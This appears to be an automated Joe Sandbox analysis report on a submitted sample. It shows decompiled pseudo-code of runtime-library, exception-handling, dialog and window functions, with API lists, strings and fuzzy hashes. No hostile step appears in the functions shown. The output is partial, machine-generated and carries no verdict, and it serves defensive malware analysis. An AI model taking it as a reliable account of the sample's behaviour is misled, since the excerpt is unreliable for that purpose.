                                                                                                                              			E00420116(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t21;
				intOrPtr _t25;
				intOrPtr _t29;
				intOrPtr _t41;
				void* _t42;

				_push(0xc);
				_push(0x438ef0);
				E00421294(__ebx, __edi, __esi);
				_t21 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t42 - 0x1c) = _t21;
				_t41 =  *((intOrPtr*)(_t42 + 8));
				 *((intOrPtr*)(_t41 + 0x5c)) = 0x43b368;
				 *((intOrPtr*)(_t41 + 0x14)) = 1;
				_t44 = _t21;
				if(_t21 != 0 && E0041FF4D(1, _t44) != 0) {
					 *((intOrPtr*)(_t41 + 0x1f8)) = GetProcAddress( *(_t42 - 0x1c), "EncodePointer");
					 *((intOrPtr*)(_t41 + 0x1fc)) = GetProcAddress( *(_t42 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t41 + 0x70)) = 1;
				 *((char*)(_t41 + 0xc8)) = 0x43;
				 *((char*)(_t41 + 0x14b)) = 0x43;
				 *(_t41 + 0x68) = 0x43a8b8;
				InterlockedIncrement(0x43a8b8);
				E004240A7(0xc);
				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
				_t25 =  *((intOrPtr*)(_t42 + 0xc));
				 *((intOrPtr*)(_t41 + 0x6c)) = _t25;
				if(_t25 == 0) {
					_t29 =  *0x43aec0; // 0x43ade8
					 *((intOrPtr*)(_t41 + 0x6c)) = _t29;
				}
				_t18 = _t41 + 0x6c; // 0x45895fc0
				_push( *_t18);
				E0041D69C();
				 *(_t42 - 4) = 0xfffffffe;
				return E004212D9(E004201CC());
			}








                                                                                                                              0x00420116
                                                                                                                              0x00420118
                                                                                                                              0x0042011d
                                                                                                                              0x00420127
                                                                                                                              0x0042012d
                                                                                                                              0x00420130
                                                                                                                              0x00420133
                                                                                                                              0x0042013d
                                                                                                                              0x00420140
                                                                                                                              0x00420142
                                                                                                                              0x0042015d
                                                                                                                              0x0042016d
                                                                                                                              0x0042016d
                                                                                                                              0x00420173
                                                                                                                              0x00420176
                                                                                                                              0x0042017d
                                                                                                                              0x00420189
                                                                                                                              0x0042018d
                                                                                                                              0x00420195
                                                                                                                              0x0042019b
                                                                                                                              0x0042019f
                                                                                                                              0x004201a2
                                                                                                                              0x004201a7
                                                                                                                              0x004201a9
                                                                                                                              0x004201ae
                                                                                                                              0x004201ae
                                                                                                                              0x004201b1
                                                                                                                              0x004201b1
                                                                                                                              0x004201b4
                                                                                                                              0x004201ba
                                                                                                                              0x004201cb

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00438EF0,0000000C,00420227,00000000,00000000,?,00000000,0041B80A,00421067,00000001,0041FF68,004011F3,00000000,?), ref: 00420127
                                                                                                                              • GetProcAddress.KERNEL32(?,EncodePointer), ref: 0042015B
                                                                                                                              • GetProcAddress.KERNEL32(?,DecodePointer), ref: 0042016B
                                                                                                                              • InterlockedIncrement.KERNEL32(0043A8B8), ref: 0042018D
                                                                                                                              • __lock.LIBCMT ref: 00420195
                                                                                                                              • ___addlocaleref.LIBCMT ref: 004201B4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                              • API String ID: 1036688887-2843748187
                                                                                                                              • Opcode ID: 4e9cffc2aa1555236ae3efe6bd578f23cf1345b9122b37990154f696244dee9a
                                                                                                                              • Instruction ID: 79b22379cc88803d881a9ddb30ef17d4fefe1bdec9dc013fb2ec09b5121ed13d
                                                                                                                              • Opcode Fuzzy Hash: 4e9cffc2aa1555236ae3efe6bd578f23cf1345b9122b37990154f696244dee9a
                                                                                                                              • Instruction Fuzzy Hash: 4E118F70A407019EE720AF76D841BAABBE0EF49304F50546FE995923A1CBB8E901CF5C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00974B70 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 00974B86
                                                                                                                                • Part of subcall function 00975822: RtlFreeHeap.NTDLL(00000000,00000000,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?), ref: 00975838
                                                                                                                                • Part of subcall function 00975822: GetLastError.KERNEL32(?,?,00976460,?,00000000,?,?,?,0097636B,?,00000007,?,?,00976BE8,?,?), ref: 0097584A
                                                                                                                              • _free.LIBCMT ref: 00974B92
                                                                                                                              • _free.LIBCMT ref: 00974B9D
                                                                                                                              • _free.LIBCMT ref: 00974BA8
                                                                                                                              • _free.LIBCMT ref: 00974BB3
                                                                                                                              • _free.LIBCMT ref: 00974BBE
                                                                                                                              • _free.LIBCMT ref: 00974BC9
                                                                                                                              • _free.LIBCMT ref: 00974BD4
                                                                                                                              • _free.LIBCMT ref: 00974BDF
                                                                                                                              • _free.LIBCMT ref: 00974BED
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: f47d1598fd38020df72be889a003d6c9efcf0c9945c70511e6fb20b0a407c235
                                                                                                                              • Instruction ID: f9c446329d41448e20e786ee8efbf2c5f93ce45a9ba5c84d85e0d39e8373bfc4
                                                                                                                              • Opcode Fuzzy Hash: f47d1598fd38020df72be889a003d6c9efcf0c9945c70511e6fb20b0a407c235
                                                                                                                              • Instruction Fuzzy Hash: AB219A77900108AFCB51EF94D841EDD7FB9BF48340F0191A5F5599B122DB72EA44CB81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 009739F9 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 00973B18
                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 00973C26
                                                                                                                              • CatchIt.LIBVCRUNTIME ref: 00973C77
                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00973D78
                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 00973D93
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                              • String ID: csm$csm$csm
                                                                                                                              • API String ID: 4119006552-393685449
                                                                                                                              • Opcode ID: 05094d9f19f0a30399f8df66d15fd87a33d6728613fefa7e70ddf573451bf3e7
                                                                                                                              • Instruction ID: 49058cf4217e21ee8ae11b4832f16c22e21de5221f7ea252134f3006fde7ef7a
                                                                                                                              • Opcode Fuzzy Hash: 05094d9f19f0a30399f8df66d15fd87a33d6728613fefa7e70ddf573451bf3e7
                                                                                                                              • Instruction Fuzzy Hash: 8AB18D72800219EFCF29DFA4C881AAEBBB9FF44310F14C559E8196B242D731DB51EB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040DD30 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 258COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 60%
                                                                                                                              			E0040DD30(char* __edx, void* __ebp, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				int _v4;
				char _v12;
				signed int _v16;
				char _v568;
				char _v572;
				char _v584;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1080;
				char _v1096;
				intOrPtr _v1100;
				intOrPtr _v1140;
				intOrPtr _v1148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				signed int _t41;
				void* _t45;
				int _t47;
				void* _t49;
				signed int _t52;
				signed int _t53;
				signed int _t56;
				void* _t58;
				void* _t66;
				void* _t69;
				intOrPtr _t73;
				void* _t75;
				void* _t81;
				void* _t83;
				void* _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t96;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t105;
				int _t108;
				signed int _t110;
				void* _t111;
				signed int _t112;
				intOrPtr* _t113;
				intOrPtr _t114;
				intOrPtr _t125;
				signed int _t134;
				void* _t147;
				intOrPtr* _t149;
				intOrPtr* _t150;
				struct HWND__* _t152;
				void* _t153;
				signed int _t156;
				void* _t157;
				signed int _t158;
				intOrPtr _t161;
				void* _t165;

				_t142 = __edx;
				_push(0xffffffff);
				_push(E004308A6);
				_push( *[fs:0x0]);
				_t158 = _t157 - 0x440;
				_t39 =  *0x43a6a8; // 0x2a5cd135
				_v16 = _t39 ^ _t158;
				_push(_t110);
				_push(__ebp);
				_t41 =  *0x43a6a8; // 0x2a5cd135
				_push(_t41 ^ _t158);
				 *[fs:0x0] =  &_v12;
				_t45 = _a8 - 0x10;
				_t152 = _a4;
				_t114 = _a16;
				if(_t45 == 0) {
					EndDialog(_t152, 0);
					L29:
					_t47 = 1;
					L30:
					 *[fs:0x0] = _v12;
					_pop(_t147);
					_pop(_t153);
					_pop(_t111);
					return E0041B3F9(_t47, _t111, _v16 ^ _t158, _t142, _t147, _t153);
				}
				_t49 = _t45 - 0x100;
				if(_t49 == 0) {
					 *0x43bde8 = _t114;
					E0040D4E0(_t114, __ebp, _t152);
					goto L29;
				}
				if(_t49 != 1) {
					L26:
					_t47 = 0;
					goto L30;
				}
				_t52 = _a12 & 0x0000ffff;
				_t165 = _t52 - 0x3ee;
				if(_t165 > 0) {
					_t53 = _t52 - 0x3fa;
					__eflags = _t53;
					if(_t53 == 0) {
						_t56 =  *0x43babc(E00407BD0(E00404510(), _t152, 0x3fa), 0xf0, 0, 0);
						__eflags = _t56;
						_t112 = _t110 & 0xffffff00 | _t56 != 0x00000000;
						_t58 = E00407BD0(E00404510(), _t152, 0x3ee);
						_v1140 = E00407BD0(E00404510(), _t152, 0x3ef);
						__eflags = _t112;
						_t156 = 0 | _t112 == 0x00000000;
						_t149 =  *0x43baa4; // 0x418f9c
						 *_t149(_t58, _t156);
						 *_t149(_v1148, _t156);
						__eflags = _t112;
						if(_t112 != 0) {
							_t66 = E00407BD0(E00404510(), _t152, 1);
							 *_t149(_t66, 1);
							_t69 = E00407BD0(E00404510(), _t152, 0x3f8);
							 *_t149(_t69, 0);
							goto L26;
						}
						L23:
						_t125 =  *0x43bde8; // 0x0
						__eflags = _t125;
						if(__eflags == 0) {
							goto L26;
						}
						E0040DAB0(_t125, __eflags);
						_t47 = 0;
						goto L30;
					}
					__eflags = _t53 != 0x11;
					if(_t53 != 0x11) {
						goto L26;
					}
					_t73 =  *0x43bde8; // 0x0
					__eflags = _t73;
					if(_t73 == 0) {
						goto L26;
					}
					_push("\\");
					_t75 = E00408450(_t110,  *((intOrPtr*)(_t73 + 0x80c)) + 4, __ebp,  &_v1096);
					_v4 = 0;
					E00408450(_t110,  *((intOrPtr*)(_t73 + 0x80c)) + 4, __ebp,  &_v1068);
					_v4 = 2;
					E00404600( &_v1096);
					_t161 = _t158 + 0x18 - 0x1c;
					_t142 =  &_v1068;
					_v1100 = _t161;
					E00401E60(_t161,  &_v1068);
					E00418E00( &_v1068, __ebp, _t152, L"help\\conv_authenticate_computers.html", _t75, L"hnv",  *((intOrPtr*)(_t73 + 0x80c)) + 4);
					_t158 = _t161 + 0x24;
					E00404600( &_v1072);
					_t47 = 0;
					goto L30;
				}
				if(_t165 == 0) {
					goto L23;
				}
				_t81 = _t52 - 1;
				if(_t81 == 0) {
					__eflags =  *0x43bde8;
					if( *0x43bde8 == 0) {
						goto L26;
					}
					_t83 = E00407BD0(E00404510(), _t152, 0x3fa);
					_t113 =  *0x43babc; // 0x418f08
					__eflags =  *_t113(_t83, 0xf0, 0, 0);
					if(__eflags == 0) {
						_t86 = E00407BD0(E00404510(), _t152, 0x3ee);
						_t150 =  *0x43bab0; // 0x418fc1
						 *_t150(_t86,  &_v1064, 0x100);
						_t89 = E00407BD0(E00404510(), _t152, 0x3ef);
						 *_t150(_t89,  &_v572, 0x100);
						_t91 =  &_v1096;
						_t142 = _t91 + 2;
						do {
							_t134 =  *_t91;
							_t91 = _t91 + 2;
							__eflags = _t134;
						} while (_t134 != 0);
						__eflags = _t91 - _t142;
						if(__eflags == 0) {
							 *0x43bab8(_t152, L"Please enter a valid username", L"Error", 8);
							_t47 = 0;
						} else {
							_t142 =  &_v568;
							_t96 =  *0x43bde8; // 0x0
							E004013C0( *((intOrPtr*)(_t96 + 0x80c)),  &_v568, __eflags,  *((intOrPtr*)(_t96 + 0x808)),  &_v1080,  &_v568);
							_t99 = E00407BD0(E00404510(), _t152, 0x3f8);
							__eflags =  *_t113(_t99, 0xf0, 0, 0);
							if(__eflags != 0) {
								_t142 =  &_v584;
								_push( &_v584);
								_t103 =  *0x43bde8; // 0x0
								E004010A0( *((intOrPtr*)(_t103 + 0x80c)), __eflags,  *((intOrPtr*)(_t103 + 0x808)),  &_v1096);
							}
							EndDialog(_t152, 1);
							_t47 = 0;
						}
						goto L30;
					}
					_t105 =  *0x43bde8; // 0x0
					E004013C0( *((intOrPtr*)(_t105 + 0x80c)), _t142, __eflags,  *((intOrPtr*)(_t105 + 0x808)), 0, 0);
					EndDialog(_t152, 1);
					_t47 = 0;
					goto L30;
				}
				_t108 = _t81 - 1;
				if(_t108 != 0) {
					goto L26;
				}
				EndDialog(_t152, _t108);
				_t47 = 0;
				goto L30;
			}




























































                                                                                                                              0x0040dd30
                                                                                                                              0x0040dd30
                                                                                                                              0x0040dd32
                                                                                                                              0x0040dd3d
                                                                                                                              0x0040dd3e
                                                                                                                              0x0040dd44
                                                                                                                              0x0040dd4b
                                                                                                                              0x0040dd52
                                                                                                                              0x0040dd53
                                                                                                                              0x0040dd56
                                                                                                                              0x0040dd5d
                                                                                                                              0x0040dd65
                                                                                                                              0x0040dd72
                                                                                                                              0x0040dd75
                                                                                                                              0x0040dd7c
                                                                                                                              0x0040dd83
                                                                                                                              0x0040e083
                                                                                                                              0x0040e089
                                                                                                                              0x0040e089
                                                                                                                              0x0040e08e
                                                                                                                              0x0040e095
                                                                                                                              0x0040e09d
                                                                                                                              0x0040e09e
                                                                                                                              0x0040e0a0
                                                                                                                              0x0040e0b5
                                                                                                                              0x0040e0b5
                                                                                                                              0x0040dd89
                                                                                                                              0x0040dd8e
                                                                                                                              0x0040e073
                                                                                                                              0x0040e079
                                                                                                                              0x00000000
                                                                                                                              0x0040e079
                                                                                                                              0x0040dd97
                                                                                                                              0x0040e06e
                                                                                                                              0x0040e06e
                                                                                                                              0x00000000
                                                                                                                              0x0040e06e
                                                                                                                              0x0040dd9d
                                                                                                                              0x0040dda5
                                                                                                                              0x0040ddaa
                                                                                                                              0x0040df26
                                                                                                                              0x0040df26
                                                                                                                              0x0040df2b
                                                                                                                              0x0040dfdc
                                                                                                                              0x0040dfe2
                                                                                                                              0x0040dfea
                                                                                                                              0x0040dff4
                                                                                                                              0x0040e00d
                                                                                                                              0x0040e013
                                                                                                                              0x0040e018
                                                                                                                              0x0040e01c
                                                                                                                              0x0040e022
                                                                                                                              0x0040e02a
                                                                                                                              0x0040e02c
                                                                                                                              0x0040e02e
                                                                                                                              0x0040e04d
                                                                                                                              0x0040e055
                                                                                                                              0x0040e064
                                                                                                                              0x0040e06c
                                                                                                                              0x00000000
                                                                                                                              0x0040e06c
                                                                                                                              0x0040e030
                                                                                                                              0x0040e030
                                                                                                                              0x0040e036
                                                                                                                              0x0040e038
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040e03a
                                                                                                                              0x0040e03f
                                                                                                                              0x00000000
                                                                                                                              0x0040e03f
                                                                                                                              0x0040df31
                                                                                                                              0x0040df34
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040df3a
                                                                                                                              0x0040df3f
                                                                                                                              0x0040df41
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040df4d
                                                                                                                              0x0040df5b
                                                                                                                              0x0040df6b
                                                                                                                              0x0040df76
                                                                                                                              0x0040df82
                                                                                                                              0x0040df8a
                                                                                                                              0x0040df94
                                                                                                                              0x0040df97
                                                                                                                              0x0040df9d
                                                                                                                              0x0040dfa2
                                                                                                                              0x0040dfa8
                                                                                                                              0x0040dfad
                                                                                                                              0x0040dfb4
                                                                                                                              0x0040dfb9
                                                                                                                              0x00000000
                                                                                                                              0x0040dfb9
                                                                                                                              0x0040ddb0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040ddb6
                                                                                                                              0x0040ddb9
                                                                                                                              0x0040ddd3
                                                                                                                              0x0040ddda
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040ddf6
                                                                                                                              0x0040ddfb
                                                                                                                              0x0040de04
                                                                                                                              0x0040de06
                                                                                                                              0x0040de40
                                                                                                                              0x0040de45
                                                                                                                              0x0040de56
                                                                                                                              0x0040de65
                                                                                                                              0x0040de78
                                                                                                                              0x0040de7a
                                                                                                                              0x0040de7e
                                                                                                                              0x0040de81
                                                                                                                              0x0040de81
                                                                                                                              0x0040de84
                                                                                                                              0x0040de87
                                                                                                                              0x0040de87
                                                                                                                              0x0040de8c
                                                                                                                              0x0040de90
                                                                                                                              0x0040df19
                                                                                                                              0x0040df1f
                                                                                                                              0x0040de92
                                                                                                                              0x0040de92
                                                                                                                              0x0040de9f
                                                                                                                              0x0040deb1
                                                                                                                              0x0040dec3
                                                                                                                              0x0040ded4
                                                                                                                              0x0040ded6
                                                                                                                              0x0040ded8
                                                                                                                              0x0040dedf
                                                                                                                              0x0040dee5
                                                                                                                              0x0040def7
                                                                                                                              0x0040def7
                                                                                                                              0x0040deff
                                                                                                                              0x0040df05
                                                                                                                              0x0040df05
                                                                                                                              0x00000000
                                                                                                                              0x0040de90
                                                                                                                              0x0040de08
                                                                                                                              0x0040de1e
                                                                                                                              0x0040de26
                                                                                                                              0x0040de2c
                                                                                                                              0x00000000
                                                                                                                              0x0040de2c
                                                                                                                              0x0040ddbb
                                                                                                                              0x0040ddbe
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x0040ddc6
                                                                                                                              0x0040ddcc
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              • EndDialog.USER32(?,?), ref: 0040DDC6
                                                                                                                              • EndDialog.USER32(?,00000001), ref: 0040DE26
                                                                                                                              • EndDialog.USER32(?,00000000), ref: 0040E083
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627219188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.627195764.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627279321.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627290592.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.627295926.000000000043F000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Dialog
                                                                                                                              • String ID: Error$Please enter a valid username$help\conv_authenticate_computers.html$hnv
                                                                                                                              • API String ID: 1120787796-2845112709
                                                                                                                              • Opcode ID: 370481a2b59e36a8cf690b6ba159d66fa4de27c3e91064bae8c6d51c61ddf50d
                                                                                                                              • Instruction ID: b44b375b112e9673ef64818d5d7023667f1d5ade344f0c898316e22334cec96b
                                                                                                                              • Opcode Fuzzy Hash: 370481a2b59e36a8cf690b6ba159d66fa4de27c3e91064bae8c6d51c61ddf50d
                                                                                                                              • Instruction Fuzzy Hash: 5381D4B1644301ABD620AB75DD46FAB33D8AF84704F004D3EB641B72D1EAFCA945869E
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0097AAD3 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0097A43F), ref: 0097AAEC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.627486759.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_950000_0ud2VlMOvF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DecodePointer
                                                                                                                              • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                              • API String ID: 3527080286-3064271455
                                                                                                                              • Opcode ID: 9dbcb2139dc4ed267fc8febaf48661fcb090eff57e4d23cc76ce4a329b0f0cc0
                                                                                                                              • Instruction ID: c341a19f8d715550daec460e843401a0fc34c7eff576e5e3d758737c35cec53f
                                                                                                                              • Opcode Fuzzy Hash: 9dbcb2139dc4ed267fc8febaf48661fcb090eff57e4d23cc76ce4a329b0f0cc0
                                                                                                                              • Instruction Fuzzy Hash: B051DF72900A0ADBCF159F68E84C1ADBFB8FFC5310F198444D0CAA7354C7798969CB46
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040F3C0 Relevance: 13.7, APIs: 9, Instructions: 161COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 58%
                                                                                                                              			E0040F3C0(void* __ecx, struct HWND__* _a4) {
				struct HWND__* _v4;
				int _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HWND__* _v28;
				intOrPtr* _t45;
				intOrPtr* _t47;
				intOrPtr* _t49;
				intOrPtr* _t51;
				intOrPtr* _t53;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t59;
				intOrPtr* _t61;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				struct HWND__* _t80;
				struct HWND__* _t81;
				struct HWND__* _t82;
				struct HWND__* _t83;
				int _t89;
				int _t90;
				void* _t91;
				intOrPtr _t92;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				struct HWND__* _t102;
				struct HWND__** _t103;

				_t103 =  &_v28;
				_t83 = 0;
				_t91 = __ecx;
				_t89 = 5;
				_v8 = 0;
				if(_a4 == 0) {
					_t89 = 0;
					_v8 = 5;
				}
				_t94 =  *((intOrPtr*)(_t91 + 4));
				_t45 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t45 == _t83) {
					_a4 = _t83;
				} else {
					_t82 =  *_t45(_t94, 0x3ea);
					_t103 =  &(_t103[2]);
					_a4 = _t82;
				}
				_t95 =  *((intOrPtr*)(_t91 + 4));
				_t47 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t47 == _t83) {
					_v28 = _t83;
				} else {
					_t81 =  *_t47(_t95, 0x3f2);
					_t103 =  &(_t103[2]);
					_v28 = _t81;
				}
				_t96 =  *((intOrPtr*)(_t91 + 4));
				_t49 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t49 == _t83) {
					_v24 = _t83;
				} else {
					_t80 =  *_t49(_t96, 0x3f3);
					_t103 =  &(_t103[2]);
					_v24 = _t80;
				}
				_t97 =  *((intOrPtr*)(_t91 + 4));
				_t51 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t51 == _t83) {
					_v20 = _t83;
				} else {
					_t79 =  *_t51(_t97, 0x3eb);
					_t103 =  &(_t103[2]);
					_v20 = _t79;
				}
				_t98 =  *((intOrPtr*)(_t91 + 4));
				_t53 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t53 == _t83) {
					_v16 = _t83;
				} else {
					_t78 =  *_t53(_t98, 0x3f4);
					_t103 =  &(_t103[2]);
					_v16 = _t78;
				}
				_t99 =  *((intOrPtr*)(_t91 + 4));
				_t55 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t55 == _t83) {
					_v12 = _t83;
				} else {
					_t77 =  *_t55(_t99, 0x3f5);
					_t103 =  &(_t103[2]);
					_v12 = _t77;
				}
				_t100 =  *((intOrPtr*)(_t91 + 4));
				_t57 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t57 == _t83) {
					_v4 = _t83;
				} else {
					_t76 =  *_t57(_t100, 0x3e9);
					_t103 =  &(_t103[2]);
					_v4 = _t76;
				}
				_t101 =  *((intOrPtr*)(_t91 + 4));
				_t59 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t59 == _t83) {
					_t102 = 0;
				} else {
					_t75 =  *_t59(_t101, 0x6c);
					_t103 =  &(_t103[2]);
					_t102 = _t75;
				}
				_t92 =  *((intOrPtr*)(_t91 + 4));
				_t61 =  *((intOrPtr*)(E00404510() + 0x70));
				if(_t61 != _t83) {
					_t83 =  *_t61(_t92, 0x7534);
				}
				ShowWindow(_a4, _t89);
				ShowWindow(_v28, _t89);
				ShowWindow(_v24, _t89);
				ShowWindow(_v20, _t89);
				ShowWindow(_v16, _t89);
				ShowWindow(_v12, _t89);
				_t90 = _v8;
				ShowWindow(_v4, _t90);
				ShowWindow(_t102, _t90);
				return ShowWindow(_t83, _t90);
			}










































                                                                                                                              0x0040f3c0
                                                                                                                              0x0040f3c6
                                                                                                                              0x0040f3cd
                                                                                                                              0x0040f3cf
                                                                                                                              0x0040f3d4
                                                                                                                              0x0040f3d8
                                                                                                                              0x0040f3da
                                                                                                                              0x0040f3dc
                                                                                                                              0x0040f3dc
                                                                                                                              0x0040f3e4
                                                                                                                              0x0040f3ec
                                                                                                                              0x0040f3f1
                                                                                                                              0x0040f404
                                                                                                                              0x0040f3f3
                                                                                                                              0x0040f3f9
                                                                                                                              0x0040f3fb
                                                                                                                              0x0040f3fe
                                                                                                                              0x0040f3fe
                                                                                                                              0x0040f408
                                                                                                                              0x0040f410
                                                                                                                              0x0040f415
                                                                                                                              0x0040f428
                                                                                                                              0x0040f417
                                                                                                                              0x0040f41d
                                                                                                                              0x0040f41f
                                                                                                                              0x0040f422
                                                                                                                              0x0040f422
                                                                                                                              0x0040f42c
                                                                                                                              0x0040f434
                                                                                                                              0x0040f439
                                                                                                                              0x0040f44c
                                                                                                                              0x0040f43b
                                                                                                                              0x0040f441
                                                                                                                              0x0040f443
                                                                                                                              0x0040f446
                                                                                                                              0x0040f446
                                                                                                                              0x0040f450
                                                                                                                              0x0040f458
                                                                                                                              0x0040f45d
                                                                                                                              0x0040f470
                                                                                                                              0x0040f45f
                                                                                                                              0x0040f465
                                                                                                                              0x0040f467
                                                                                                                              0x0040f46a
                                                                                                                              0x0040f46a
                                                                                                                              0x0040f474
                                                                                                                              0x0040f47c
                                                                                                                              0x0040f481
                                                                                                                              0x0040f494
                                                                                                                              0x0040f483
                                                                                                                              0x0040f489
                                                                                                                              0x0040f48b
                                                                                                                              0x0040f48e
                                                                                                                              0x0040f48e
                                                                                                                              0x0040f498
                                                                                                                              0x0040f4a0
                                                                                                                              0x0040f4a5
                                                                                                                              0x0040f4b8
                                                                                                                              0x0040f4a7
                                                                                                                              0x0040f4ad
                                                                                                                              0x0040f4af
                                                                                                                              0x0040f4b2
                                                                                                                              0x0040f4b2
                                                                                                                              0x0040f4bc
                                                                                                                              0x0040f4c4
                                                                                                                              0x0040f4c9
                                                                                                                              0x0040f4dc
                                                                                                                              0x0040f4cb
                                                                                                                              0x0040f4d1
                                                                                                                              0x0040f4d3
                                                                                                                              0x0040f4d6
                                                                                                                              0x0040f4d6
                                                                                                                              0x0040f4e0
                                                                                                                              0x0040f4e8
                                                                                                                              0x0040f4ed
                                                                                                                              0x0040f4fb
                                                                                                                              0x0040f4ef
                                                                                                                              0x0040f4f2
                                                                                                                              0x0040f4f4
                                                                                                                              0x0040f4f7
                                                                                                                              0x0040f4f7
                                                                                                                              0x0040f4fd
                                                                                                                              0x0040f505
